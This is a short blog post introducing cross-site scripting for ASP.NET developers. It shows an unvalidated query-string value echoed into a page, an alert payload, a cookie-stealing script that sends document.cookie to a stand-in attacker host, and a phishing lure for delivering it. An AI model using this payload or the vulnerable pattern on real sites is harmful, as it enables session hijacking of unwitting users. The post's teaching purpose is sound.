Primer on Cross-Site Scripting

In its security push Microsoft evangelises (amongst other things) on defending against known weaknesses. This is done by using best practices and the best technology to migitate the risks of threats.

One of the threats is Cross-Site Scripting (XSS), where malicious (or simply annoying) script is injected as part of a page. The vulnerability exploited is unvalidated user input that is taken and “pasted” as part of the page. Here’s a simple example to get you in the right frame of mind:

<SCRIPT RUNAT=”server”>
  lblPostedBy.Text = Request.QueryString[“ForumUserName”];
</SCRIPT>

Now imagine that someone would put as his forum name (and it might be read from Session variables or from a database as well) not “LX” but “<SCRIPT>alert(‘.NET Rulez’);</SCRIPT>“. Pretty annoying right. It gets worse. Try this:

<IMG NAME=”dummyImage”><SCRIPT>document.forms[0].dummyImage.src = ‘http://www.illhackyouremailaccount.com/storecookieinfo.aspx?cookie=’ + document.cookie);</SCRIPT>

This is a way to do cookie-hijacking with an XSS technique. All you need to do is send people a mail with a link looking like “Click here to get VS2005 Team System for free” and have the url point to www.somesite.com/showinbox.asp?forumname=… where the dots represent the bit from <IMG> in a URL encoded form. If the site is vulnerable for XSS it will send the cookie information to the other site, where it is stored. There it is used to manipulate a cookie that will allow you to enter the session of the user that was tricked into clicking the link.

So, now you now about XSS a bit. Tomorrow a posting on how to mitigate this risk by using HttpOnly cookies, a new feature in Internet Explorer 6.0 SP1. (Actually the main reason why I elaborated on XSS)

Advertisements
This entry was posted in Uncategorized. Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s